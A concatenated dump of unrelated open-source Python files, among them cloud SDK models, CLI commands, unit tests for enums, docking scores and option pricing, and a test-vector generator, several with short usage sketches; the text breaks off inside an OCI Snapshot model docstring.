ext_service = self.client.get_resource(record.get('href'))
ext_rights = self.client.get_linked_resource(ext_service,
RelationType.RIGHTS,
EntityType.RIGHTS.value)
return self.client.post_linked_resource(ext_rights,
RelationType.ADD,
EntityType.RIGHT.value,
params)
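# --- Usage sketch (editor's addition, not part of the original module) ---
# A minimal, hedged example of driving APIExtension end to end. The vCD host,
# credentials, AMQP exchange and URL pattern below are placeholder assumptions,
# and the Client/BasicLoginCredentials construction follows the usual pyvcloud
# pattern rather than anything defined in this file.
if __name__ == '__main__':
    from pyvcloud.vcd.client import BasicLoginCredentials, Client
    client = Client('vcd.example.com', verify_ssl_certs=False)
    client.set_credentials(
        BasicLoginCredentials('administrator', 'System', 'password'))
    ext_mgr = APIExtension(client)
    # Register a new extension service with a single URL filter.
    ext_mgr.add_extension(
        name='my-extension',
        namespace='my-extension',
        routing_key='my-extension',
        exchange='vcdext',
        patterns=['/api/my-extension/.*'])
    # List everything that is currently registered, then clean up.
    for record in ext_mgr.list_extensions():
        print(record['name'], record['enabled'])
    ext_mgr.delete_extension('my-extension', 'my-extension')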
|
tests/utils/test_extendable_enum.py
|
ZackPashkin/toloka-kit
| 153 |
67209
|
<gh_stars>100-1000
import pytest
from enum import Enum
from toloka.client._converter import converter
from toloka.util._extendable_enum import extend_enum, ExtendableStrEnum
from toloka.client.primitives.base import BaseTolokaObject
@pytest.fixture
def test_enum():
class TestEnum(Enum):
A = 'a'
B = 'b'
return TestEnum
@pytest.fixture
def test_extendable_enum():
class TestExtendableEnum(ExtendableStrEnum):
A = 'a'
B = 'b'
return TestExtendableEnum
@pytest.mark.parametrize(
['name', 'value', 'is_new'],
[
('A', 'b', False),
('C', 'a', False),
('C', 'c', True)
]
)
def test_extend_enum(test_enum, name, value, is_new):
enum_len = len(test_enum)
new_member = extend_enum(test_enum, name, value)
if is_new:
assert new_member and new_member.name == name and new_member.value == value
assert len(test_enum) == enum_len + 1
else:
assert new_member and (new_member.name == name or new_member.value == value)
assert len(test_enum) == enum_len
def test_extendable_str_enum(test_extendable_enum):
assert test_extendable_enum.A.value == 'a'
assert test_extendable_enum.C
assert test_extendable_enum.C.name == 'C'
assert test_extendable_enum.C.value == 'C'
# get by value
assert test_extendable_enum('D')
assert test_extendable_enum.D.name == 'D'
assert test_extendable_enum.D.value == 'D'
assert test_extendable_enum(test_extendable_enum.E)
assert test_extendable_enum.E.name == 'E'
assert test_extendable_enum.E.value == 'E'
# get by name
assert test_extendable_enum['F']
assert test_extendable_enum.F.name == 'F'
assert test_extendable_enum.F.value == 'F'
def test_extendable_str_enum_structure(test_extendable_enum):
result = converter.structure('a', test_extendable_enum)
assert result and result.name == 'A' and result.value == 'a'
result = converter.structure('new_key', test_extendable_enum)
assert result and result.name == 'new_key' and result.value == 'new_key'
def test_extendable_str_enum_unstructure(test_extendable_enum):
assert converter.unstructure(test_extendable_enum.A) == 'a'
assert converter.unstructure(test_extendable_enum.D) == 'D'
def test_variant_type():
class MyEnum(ExtendableStrEnum):
DOG = 'dog'
CAT = 'cat'
class Animal(BaseTolokaObject, spec_enum=MyEnum, spec_field='type'):
pass
class Dog(Animal, spec_value=MyEnum.DOG):
pass
class Cat(Animal, spec_value=MyEnum.CAT):
pass
assert converter.structure({'type': 'dog'}, Animal) == Dog()
assert converter.structure({'type': 'cat'}, Animal) == Cat()
assert Dog().unstructure() == {'type': 'dog'}
assert Cat().unstructure() == {'type': 'cat'}
def test_empty_structure(test_enum, test_extendable_enum):
class MyClass(BaseTolokaObject):
enum_field: test_enum
extendable_enum_field: test_extendable_enum
assert MyClass.structure({}) == MyClass()
|
alipay/aop/api/domain/AlipayEbppIndustryBillNettingRefundModel.py
|
snowxmas/alipay-sdk-python-all
| 213 |
67213
|
<filename>alipay/aop/api/domain/AlipayEbppIndustryBillNettingRefundModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.IndustryExtendField import IndustryExtendField
class AlipayEbppIndustryBillNettingRefundModel(object):
def __init__(self):
self._alipay_bill_no = None
self._industry_extend_field_list = None
self._memo = None
self._netting_amount = None
self._scene = None
@property
def alipay_bill_no(self):
return self._alipay_bill_no
@alipay_bill_no.setter
def alipay_bill_no(self, value):
self._alipay_bill_no = value
@property
def industry_extend_field_list(self):
return self._industry_extend_field_list
@industry_extend_field_list.setter
def industry_extend_field_list(self, value):
if isinstance(value, list):
self._industry_extend_field_list = list()
for i in value:
if isinstance(i, IndustryExtendField):
self._industry_extend_field_list.append(i)
else:
self._industry_extend_field_list.append(IndustryExtendField.from_alipay_dict(i))
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def netting_amount(self):
return self._netting_amount
@netting_amount.setter
def netting_amount(self, value):
self._netting_amount = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
def to_alipay_dict(self):
params = dict()
if self.alipay_bill_no:
if hasattr(self.alipay_bill_no, 'to_alipay_dict'):
params['alipay_bill_no'] = self.alipay_bill_no.to_alipay_dict()
else:
params['alipay_bill_no'] = self.alipay_bill_no
if self.industry_extend_field_list:
if isinstance(self.industry_extend_field_list, list):
for i in range(0, len(self.industry_extend_field_list)):
element = self.industry_extend_field_list[i]
if hasattr(element, 'to_alipay_dict'):
self.industry_extend_field_list[i] = element.to_alipay_dict()
if hasattr(self.industry_extend_field_list, 'to_alipay_dict'):
params['industry_extend_field_list'] = self.industry_extend_field_list.to_alipay_dict()
else:
params['industry_extend_field_list'] = self.industry_extend_field_list
if self.memo:
if hasattr(self.memo, 'to_alipay_dict'):
params['memo'] = self.memo.to_alipay_dict()
else:
params['memo'] = self.memo
if self.netting_amount:
if hasattr(self.netting_amount, 'to_alipay_dict'):
params['netting_amount'] = self.netting_amount.to_alipay_dict()
else:
params['netting_amount'] = self.netting_amount
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayEbppIndustryBillNettingRefundModel()
if 'alipay_bill_no' in d:
o.alipay_bill_no = d['alipay_bill_no']
if 'industry_extend_field_list' in d:
o.industry_extend_field_list = d['industry_extend_field_list']
if 'memo' in d:
o.memo = d['memo']
if 'netting_amount' in d:
o.netting_amount = d['netting_amount']
if 'scene' in d:
o.scene = d['scene']
return o
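# --- Usage sketch (editor's addition) ---
# A minimal round trip through the dict helpers defined above. The field
# values are illustrative placeholders, assuming the alipay SDK package that
# provides IndustryExtendField is importable.
if __name__ == '__main__':
    model = AlipayEbppIndustryBillNettingRefundModel()
    model.alipay_bill_no = '2021XXXXXXXXXXXX'
    model.memo = 'netting refund demo'
    model.netting_amount = '10.00'
    model.scene = 'INDUSTRY'
    payload = model.to_alipay_dict()
    restored = AlipayEbppIndustryBillNettingRefundModel.from_alipay_dict(payload)
    assert restored.memo == model.memo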
|
terrascript/spotinst/__init__.py
|
hugovk/python-terrascript
| 507 |
67266
|
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
wetectron/data/transforms/build.py
|
akobiisr/wetectron
| 332 |
67270
|
# --------------------------------------------------------
# Copyright (C) 2020 NVIDIA Corporation. All rights reserved.
# Nvidia Source Code License-NC
# --------------------------------------------------------
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch
from . import transforms as T
_imagenet_pca = {
'eigval': torch.Tensor([0.2175, 0.0188, 0.0045]),
'eigvec': torch.Tensor([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
def build_transforms(cfg, is_train=True):
if is_train:
min_size = cfg.INPUT.MIN_SIZE_TRAIN
max_size = cfg.INPUT.MAX_SIZE_TRAIN
flip_horizontal_prob = 0.5 # cfg.INPUT.FLIP_PROB_TRAIN
flip_vertical_prob = cfg.INPUT.VERTICAL_FLIP_PROB_TRAIN
brightness = cfg.INPUT.BRIGHTNESS
contrast = cfg.INPUT.CONTRAST
saturation = cfg.INPUT.SATURATION
hue = cfg.INPUT.HUE
else:
min_size = cfg.INPUT.MIN_SIZE_TEST
max_size = cfg.INPUT.MAX_SIZE_TEST
flip_horizontal_prob = 0.0
flip_vertical_prob = 0.0
brightness = 0.0
contrast = 0.0
saturation = 0.0
hue = 0.0
to_bgr255 = cfg.INPUT.TO_BGR255
normalize_transform = T.Normalize(
mean=cfg.INPUT.PIXEL_MEAN, std=cfg.INPUT.PIXEL_STD, to_bgr255=to_bgr255
)
color_jitter = T.ColorJitter(
brightness=brightness,
contrast=contrast,
saturation=saturation,
hue=hue,
)
if cfg.INPUT.PCA:
transform = T.Compose(
[
color_jitter,
T.Resize(min_size, max_size),
T.RandomHorizontalFlip(flip_horizontal_prob),
T.RandomVerticalFlip(flip_vertical_prob),
T.ToTensor(),
T.Lighting(0.1, _imagenet_pca['eigval'], _imagenet_pca['eigvec']),
normalize_transform,
]
)
else:
transform = T.Compose(
[
color_jitter,
T.Resize(min_size, max_size),
T.RandomHorizontalFlip(flip_horizontal_prob),
T.RandomVerticalFlip(flip_vertical_prob),
T.ToTensor(),
normalize_transform,
]
)
return transform
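# --- Usage sketch (editor's addition) ---
# A hedged example of calling build_transforms with a hand-rolled cfg stub.
# The real project presumably uses yacs-style config nodes; the SimpleNamespace
# below only mimics the attributes read above, and every value is an assumption
# rather than a documented default.
if __name__ == '__main__':
    from types import SimpleNamespace
    cfg = SimpleNamespace(INPUT=SimpleNamespace(
        MIN_SIZE_TRAIN=(800,), MAX_SIZE_TRAIN=1333,
        MIN_SIZE_TEST=800, MAX_SIZE_TEST=1333,
        VERTICAL_FLIP_PROB_TRAIN=0.0,
        BRIGHTNESS=0.0, CONTRAST=0.0, SATURATION=0.0, HUE=0.0,
        TO_BGR255=True,
        PIXEL_MEAN=[102.9801, 115.9465, 122.7717], PIXEL_STD=[1.0, 1.0, 1.0],
        PCA=False))
    # Build the evaluation-time pipeline (no flips, no color jitter).
    print(build_transforms(cfg, is_train=False))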
|
Chapter10/url_response_header.py
|
add54/ADMIN_SYS_PYTHON
| 116 |
67290
|
<reponame>add54/ADMIN_SYS_PYTHON
import urllib.request
x = urllib.request.urlopen('https://www.imdb.com/')
print(x.info())
|
deepchem/dock/tests/test_pose_scoring.py
|
cjgalvin/deepchem
| 3,782 |
67296
|
<filename>deepchem/dock/tests/test_pose_scoring.py
"""
Tests for Pose Scoring
"""
import logging
import unittest
import numpy as np
from deepchem.dock.pose_scoring import vina_nonlinearity
from deepchem.dock.pose_scoring import vina_hydrophobic
from deepchem.dock.pose_scoring import vina_gaussian_first
from deepchem.dock.pose_scoring import vina_gaussian_second
from deepchem.dock.pose_scoring import vina_hbond
from deepchem.dock.pose_scoring import vina_repulsion
from deepchem.dock.pose_scoring import cutoff_filter
from deepchem.dock.pose_scoring import vina_energy_term
logger = logging.getLogger(__name__)
class TestPoseScoring(unittest.TestCase):
"""
  Does sanity checks on pose scoring.
"""
def test_cutoff_filter(self):
N = 10
M = 5
d = np.ones((N, M))
x = np.random.rand(N, M)
cutoff_dist = 0.5
x_thres = cutoff_filter(d, x, cutoff=cutoff_dist)
assert (x_thres == np.zeros((N, M))).all()
def test_vina_nonlinearity(self):
N = 10
M = 5
c = np.random.rand(N, M)
Nrot = 5
w = 0.5
out_tensor = vina_nonlinearity(c, w, Nrot)
assert out_tensor.shape == (N, M)
assert (out_tensor == c / (1 + w * Nrot)).all()
def test_vina_repulsion(self):
N = 10
M = 5
d = np.ones((N, M))
out_tensor = vina_repulsion(d)
assert out_tensor.shape == (N, M)
# Where d is greater than zero, the repulsion is just zeros
assert (out_tensor == np.zeros_like(d)).all()
def test_vina_hydrophobic(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_hydrophobic(d)
assert out_tensor.shape == (N, M)
# When d is 0, this should just be 1
assert (out_tensor == np.ones_like(d)).all()
def test_vina_hbond(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_hbond(d)
assert out_tensor.shape == (N, M)
# When d == 0, the hbond interaction is 0
assert (out_tensor == np.zeros_like(d)).all()
def test_vina_gaussian(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_gaussian_first(d)
assert out_tensor.shape == (N, M)
# The exponential returns 1 when input 0.
assert (out_tensor == np.ones_like(d)).all()
d = 3 * np.ones((N, M))
out_tensor = vina_gaussian_second(d)
assert out_tensor.shape == (N, M)
# This exponential returns 1 when input 3
assert (out_tensor == np.ones_like(d)).all()
def test_energy_term(self):
N = 10
M = 5
coords1 = np.random.rand(N, 3)
coords2 = np.random.rand(M, 3)
weights = np.ones((5,))
wrot = 1.0
Nrot = 3
energy = vina_energy_term(coords1, coords2, weights, wrot, Nrot)
assert energy > 0
|
tests/gen_vectors/gen_uint128_intrinsics_vectors.py
|
cryspen/hacl-star
| 201 |
67311
|
import os
import random
import itertools
vector_template = '''static uint64_t {}[{}] =
{{
{}
}};
'''
max_u64 = 0xffffffffffffffff
max_u64_str = str(hex(max_u64))
def get_random_u64 (size):
return '0x' + (os.urandom(size).hex() if size != 0 else '0')
def print_vectors (name, l):
return vector_template.format(name, str(len(l)), ',\n '.join(l))
def main():
edge_cases = itertools.product(
['0x0', max_u64_str], ['0x0', max_u64_str], ['0x0', '0x1'])
# (size of a, size of b, number of vectors to generate)
configs = [(0,1,10), (1,1,10), (2,2,10), (2,3,10), (3,4,10), (4,4,10),
(5,4,10), (4,5,10), (6,6,10), (7,7,10), (8,8,20)]
a_vectors = []
b_vectors = []
cin_vectors = []
addcarry_res_vectors = []
addcarry_cout_vectors = []
subborrow_res_vectors = []
subborrow_cout_vectors = []
def compute_vector(a, b, cin):
a_vectors.append(a)
b_vectors.append(b)
cin_vectors.append(cin)
addition = int(a, 16) + int(b, 16) + int(cin, 16)
cout = addition // (max_u64 + 1)
res = addition % (max_u64 + 1)
res = max_u64 if res < 0 else res
addcarry_res_vectors.append(hex(res))
addcarry_cout_vectors.append(hex(cout))
subtraction = int(a, 16) - int(b, 16) - int(cin, 16)
if subtraction >= 0:
res = subtraction
cout = 0
else:
res = max_u64 + subtraction + 1
cout = 1
subborrow_res_vectors.append(hex(res))
subborrow_cout_vectors.append(hex(cout))
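    # Worked example (editor's addition) of the carry/borrow arithmetic above,
    # with concrete values instead of random ones:
    #   a = 0xffffffffffffffff, b = 0x1, cin = 0x0
    #     addition    = 2**64  -> addcarry_res = 0x0, addcarry_cout = 0x1
    #     subtraction = a - b  -> subborrow_res = 0xfffffffffffffffe, cout = 0x0
    #   a = 0x0, b = 0x1, cin = 0x1
    #     subtraction = -2     -> subborrow_res = max_u64 + (-2) + 1
    #                           = 0xfffffffffffffffe, subborrow_cout = 0x1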
for c in edge_cases:
compute_vector(*c)
for c in configs:
for i in range(c[2]):
a = get_random_u64(c[0])
b = get_random_u64(c[1])
cin = '0x' + str(random.randint(0,1))
compute_vector(a, b, cin)
with open('uint128-intrinsics_vectors.h', 'w') as f:
f.write('static uint32_t num_vectors = {};\n\n'.format(len(a_vectors)))
f.write(print_vectors('a_vectors', a_vectors))
f.write(print_vectors('b_vectors', b_vectors))
f.write(print_vectors('cin_vectors', cin_vectors))
f.write(print_vectors('addcarry_res_vectors', addcarry_res_vectors))
f.write(print_vectors('addcarry_cout_vectors', addcarry_cout_vectors))
f.write(print_vectors('subborrow_res_vectors', subborrow_res_vectors))
f.write(print_vectors('subborrow_cout_vectors', subborrow_cout_vectors))
main ()
|
src/genie/libs/parser/iosxe/tests/ShowRunInterface/cli/equal/golden_output12_expected.py
|
balmasea/genieparser
| 204 |
67314
|
<reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowRunInterface/cli/equal/golden_output12_expected.py
expected_output={
"interfaces": {
"Tunnel100": {
"autoroute_announce": "enabled",
"src_ip": "Loopback0",
"tunnel_bandwidth": 500,
"tunnel_dst": "2.2.2.2",
"tunnel_mode": "mpls traffic-eng",
"tunnel_path_option": {
"1": {
"path_type": "dynamic"
}
},
"tunnel_priority": [
"7 7"
]
}
}
}
|
src/fidesctl/cli/commands/generate.py
|
ethyca/fides
| 153 |
67321
|
<filename>src/fidesctl/cli/commands/generate.py
"""Contains the generate group of CLI commands for Fidesctl."""
import click
from fidesctl.cli.options import (
aws_access_key_id_option,
aws_region_option,
aws_secret_access_key_option,
connection_string_option,
credentials_id_option,
include_null_flag,
okta_org_url_option,
okta_token_option,
)
from fidesctl.cli.utils import (
handle_aws_credentials_options,
handle_database_credentials_options,
handle_okta_credentials_options,
with_analytics,
)
from fidesctl.core import dataset as _dataset
from fidesctl.core import system as _system
@click.group(name="generate")
@click.pass_context
def generate(ctx: click.Context) -> None:
"""
Generate fidesctl resource types
"""
@generate.group(name="dataset")
@click.pass_context
def generate_dataset(ctx: click.Context) -> None:
"""
Generate fidesctl Dataset resources
"""
@generate_dataset.command(name="db")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@connection_string_option
@include_null_flag
@with_analytics
def generate_dataset_db(
ctx: click.Context,
output_filename: str,
connection_string: str,
credentials_id: str,
include_null: bool,
) -> None:
"""
Connect to a database directly via a SQLAlchemy-style connection string and
generate a dataset manifest file that consists of every schema/table/field.
Connection string can be supplied as an option or a credentials reference
to fidesctl config.
This is a one-time operation that does not track the state of the database.
It will need to be run again if the database schema changes.
"""
actual_connection_string = handle_database_credentials_options(
fides_config=ctx.obj["CONFIG"],
connection_string=connection_string,
credentials_id=credentials_id,
)
_dataset.generate_dataset_db(
connection_string=actual_connection_string,
file_name=output_filename,
include_null=include_null,
)
@generate.group(name="system")
@click.pass_context
def generate_system(ctx: click.Context) -> None:
"""
Generate fidesctl System resources
"""
@generate_system.command(name="okta")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@okta_org_url_option
@okta_token_option
@include_null_flag
@with_analytics
def generate_system_okta(
ctx: click.Context,
output_filename: str,
credentials_id: str,
token: str,
org_url: str,
include_null: bool,
) -> None:
"""
    Generates systems for your Okta applications. Connect to an Okta admin
    account by providing an organization URL and auth token or a credentials
    reference to the fidesctl config. The auth token and organization URL can
    also be supplied by setting environment variables as defined by the Okta
    Python SDK.
    This is a one-time operation that does not track the state of the Okta resources.
It will need to be run again if the tracked resources change.
"""
okta_config = handle_okta_credentials_options(
fides_config=ctx.obj["CONFIG"],
token=token,
org_url=org_url,
credentials_id=credentials_id,
)
_system.generate_system_okta(
okta_config=okta_config,
file_name=output_filename,
include_null=include_null,
)
@generate_system.command(name="aws")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@aws_access_key_id_option
@aws_secret_access_key_option
@aws_region_option
@include_null_flag
@click.option("-o", "--organization", type=str, default="default_organization")
@with_analytics
def generate_system_aws(
ctx: click.Context,
output_filename: str,
include_null: bool,
organization: str,
credentials_id: str,
access_key_id: str,
secret_access_key: str,
region: str,
) -> None:
"""
    Connect to an AWS account and generate a system manifest file that consists
    of every tracked resource.
    Credentials can be supplied as options, as a credentials reference to the
    fidesctl config, or via the boto3 environment configuration.
    Tracked resources: [Redshift, RDS]
    This is a one-time operation that does not track the state of the AWS resources.
It will need to be run again if the tracked resources change.
"""
config = ctx.obj["CONFIG"]
aws_config = handle_aws_credentials_options(
fides_config=config,
access_key_id=access_key_id,
secret_access_key=secret_access_key,
region=region,
credentials_id=credentials_id,
)
_system.generate_system_aws(
file_name=output_filename,
include_null=include_null,
organization_key=organization,
aws_config=aws_config,
url=config.cli.server_url,
headers=config.user.request_headers,
)
|
tests/test_options.py
|
gliptak/pyfinance
| 278 |
67327
|
# flake8: noqa
# Test cases taken from:
# - Thomas Ho Company LTD: financial models,
# http://www.thomasho.com/mainpages/analysoln.asp
# - Analysis of Derivatives for the Chartered Financial Analyst® Program,
# <NAME>, PhD, CFA, ©2003 CFA Institute
import types
import numpy as np
import pandas as pd
from pyfinance.options import *
np.random.seed(123)
RTOL = 1e-03
# BSM
# ---------------------------------------------------------------------
s, k, t, sigma, r = 100.0, 100.0, 1.0, 0.2, 0.04
greeks = {
"call": (
0.3,
0.1,
0.61791,
0.01907,
38.13878,
-5.88852,
51.86609,
6.22577,
),
"put": (
0.3,
0.1,
-0.38209,
0.01907,
38.13878,
-2.04536,
-44.21286,
-6.36390,
),
}
names = ("d1", "d2", "delta", "gamma", "vega", "theta", "rho", "omega")
target = {
"call": dict(zip(names, greeks["call"])),
"put": dict(zip(names, greeks["put"])),
}
target["call"].update({"value": 9.92505})
target["put"].update({"value": 6.00400})
options = {
"call": BSM(S0=s, K=k, T=t, r=r, sigma=sigma, kind="call"),
"put": BSM(S0=s, K=k, T=t, r=r, sigma=sigma, kind="put"),
}
def test_BSM():
for name, option in options.items():
for k, v in target[name].items():
if isinstance(getattr(option, k), types.MethodType):
assert np.allclose(v, getattr(option, k)(), rtol=RTOL)
else:
assert np.allclose(v, getattr(option, k), rtol=RTOL)
# Put/call
# ---------------------------------------------------------------------
k, price, s = 2000.0, 81.75, np.array([1900.0, 2100.0])
call = Call(K=k, price=price, St=s, pos="long")
put = Put(K=k, price=price, St=s, pos="long")
def test_put_and_call():
assert np.allclose(call.payoff(), np.array([0.0, 100.0]))
assert np.allclose(call.profit(), np.array([-81.75, 18.25]))
assert np.allclose(put.payoff(), np.array([100.0, 0.0]))
assert np.allclose(put.profit(), np.array([18.25, -81.75]))
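# Worked example (editor's addition): with K = 2000 and an 81.75 premium, the
# long call at S_T = 2100 pays off max(S_T - K, 0) = 100 and profits
# 100 - 81.75 = 18.25, while at S_T = 1900 it expires worthless and loses the
# 81.75 premium; the long put mirrors this with payoff max(K - S_T, 0).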
# Options strategies
# ---------------------------------------------------------------------
# Straddle', 'ShortStraddle', 'Strangle',
# 'ShortStrangle', 'Strip', 'Strap', 'BullSpread', 'BearSpread',
# 'LongPutLadder', 'ShortPutLadder', 'LongButterfly', 'ShortButterfly',
# 'LongIronButterfly', 'ShortIronButterfly', 'LongCondor', 'ShortCondor',
# 'LongIronCondor', 'ShortIronCondor'
s = np.array([2100, 2000, 1900])
k1 = 1950.0
k2 = 2050.0
p1 = 108.43
p2 = 59.98
bullspread = BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2)
p1 = 56.01
p2 = 107.39
bearspread = BearSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2)
# TODO
# bs = {
# 'call': BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2, kind='call'),
# 'put': BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2, kind='put')
# }
s = np.array([1900.0, 1975.0, 2025.0, 2100.0])
k1, k2, k3 = 1950.0, 2000.0, 2050.0
p1, p2, p3 = 108.43, 81.75, 59.98
bfly = LongButterfly(
St=s, K1=k1, K2=k2, K3=k3, price1=p1, price2=p2, price3=p3, kind="call"
)
s = np.array([2100.0, 1900.0])
k = 2000
c = 81.75
p = 79.25
straddle = Straddle(St=s, K=k, callprice=c, putprice=p)
def test_opstrats():
assert np.allclose(
bullspread.payoff(), np.array([100.0, 50.0, 0.0]), rtol=RTOL
)
assert np.allclose(
bullspread.profit(), np.array([51.55, 1.55, -48.45]), rtol=RTOL
)
assert np.allclose(
bearspread.payoff(), np.array([0.0, 50.0, 100.0]), rtol=RTOL
)
assert np.allclose(
bearspread.profit(), np.array([-51.38, -1.38, 48.62]), rtol=RTOL
)
assert np.allclose(
bfly.payoff(), np.array([0.0, 25.0, 25.0, 0.0]), rtol=RTOL
)
assert np.allclose(
bfly.profit(), np.array([-4.91, 20.09, 20.09, -4.91]), rtol=RTOL
)
assert np.allclose(straddle.payoff(), np.array([100.0, 100.0]), rtol=RTOL)
assert np.allclose(straddle.profit(), np.array([-61.0, -61.0]), rtol=RTOL)
|
src/oci/file_storage/models/snapshot.py
|
Manny27nyc/oci-python-sdk
| 249 |
67330
|
<filename>src/oci/file_storage/models/snapshot.py
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Snapshot(object):
"""
A point-in-time snapshot of a specified file system.
**Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API.
"""
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "CREATING"
LIFECYCLE_STATE_CREATING = "CREATING"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "DELETING"
LIFECYCLE_STATE_DELETING = "DELETING"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
def __init__(self, **kwargs):
"""
Initializes a new Snapshot object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param file_system_id:
The value to assign to the file_system_id property of this Snapshot.
:type file_system_id: str
:param id:
The value to assign to the id property of this Snapshot.
:type id: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this Snapshot.
Allowed values for this property are: "CREATING", "ACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type lifecycle_state: str
:param name:
The value to assign to the name property of this Snapshot.
:type name: str
:param time_created:
The value to assign to the time_created property of this Snapshot.
:type time_created: datetime
:param provenance_id:
The value to assign to the provenance_id property of this Snapshot.
:type provenance_id: str
:param is_clone_source:
The value to assign to the is_clone_source property of this Snapshot.
:type is_clone_source: bool
:param lifecycle_details:
The value to assign to the lifecycle_details property of this Snapshot.
:type lifecycle_details: str
:param freeform_tags:
The value to assign to the freeform_tags property of this Snapshot.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this Snapshot.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'file_system_id': 'str',
'id': 'str',
'lifecycle_state': 'str',
'name': 'str',
'time_created': 'datetime',
'provenance_id': 'str',
'is_clone_source': 'bool',
'lifecycle_details': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'file_system_id': 'fileSystemId',
'id': 'id',
'lifecycle_state': 'lifecycleState',
'name': 'name',
'time_created': 'timeCreated',
'provenance_id': 'provenanceId',
'is_clone_source': 'isCloneSource',
'lifecycle_details': 'lifecycleDetails',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._file_system_id = None
self._id = None
self._lifecycle_state = None
self._name = None
self._time_created = None
self._provenance_id = None
self._is_clone_source = None
self._lifecycle_details = None
self._freeform_tags = None
self._defined_tags = None
@property
def file_system_id(self):
"""
**[Required]** Gets the file_system_id of this Snapshot.
The `OCID`__ of the file system from which the snapshot
was created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The file_system_id of this Snapshot.
:rtype: str
"""
return self._file_system_id
@file_system_id.setter
def file_system_id(self, file_system_id):
"""
Sets the file_system_id of this Snapshot.
The `OCID`__ of the file system from which the snapshot
was created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param file_system_id: The file_system_id of this Snapshot.
:type: str
"""
self._file_system_id = file_system_id
@property
def id(self):
"""
**[Required]** Gets the id of this Snapshot.
The `OCID`__ of the snapshot.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The id of this Snapshot.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this Snapshot.
The `OCID`__ of the snapshot.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param id: The id of this Snapshot.
:type: str
"""
self._id = id
@property
def lifecycle_state(self):
"""
**[Required]** Gets the lifecycle_state of this Snapshot.
The current state of the snapshot.
Allowed values for this property are: "CREATING", "ACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The lifecycle_state of this Snapshot.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this Snapshot.
The current state of the snapshot.
:param lifecycle_state: The lifecycle_state of this Snapshot.
:type: str
"""
allowed_values = ["CREATING", "ACTIVE", "DELETING", "DELETED"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
lifecycle_state = 'UNKNOWN_ENUM_VALUE'
self._lifecycle_state = lifecycle_state
@property
def name(self):
"""
**[Required]** Gets the name of this Snapshot.
Name of the snapshot. This value is immutable.
Avoid entering confidential information.
Example: `Sunday`
:return: The name of this Snapshot.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Snapshot.
Name of the snapshot. This value is immutable.
Avoid entering confidential information.
Example: `Sunday`
:param name: The name of this Snapshot.
:type: str
"""
self._name = name
@property
def time_created(self):
"""
**[Required]** Gets the time_created of this Snapshot.
The date and time the snapshot was created, expressed
in `RFC 3339`__ timestamp format.
Example: `2016-08-25T21:10:29.600Z`
__ https://tools.ietf.org/rfc/rfc3339
:return: The time_created of this Snapshot.
:rtype: datetime
"""
return self._time_created
@time_created.setter
def time_created(self, time_created):
"""
Sets the time_created of this Snapshot.
The date and time the snapshot was created, expressed
in `RFC 3339`__ timestamp format.
Example: `2016-08-25T21:10:29.600Z`
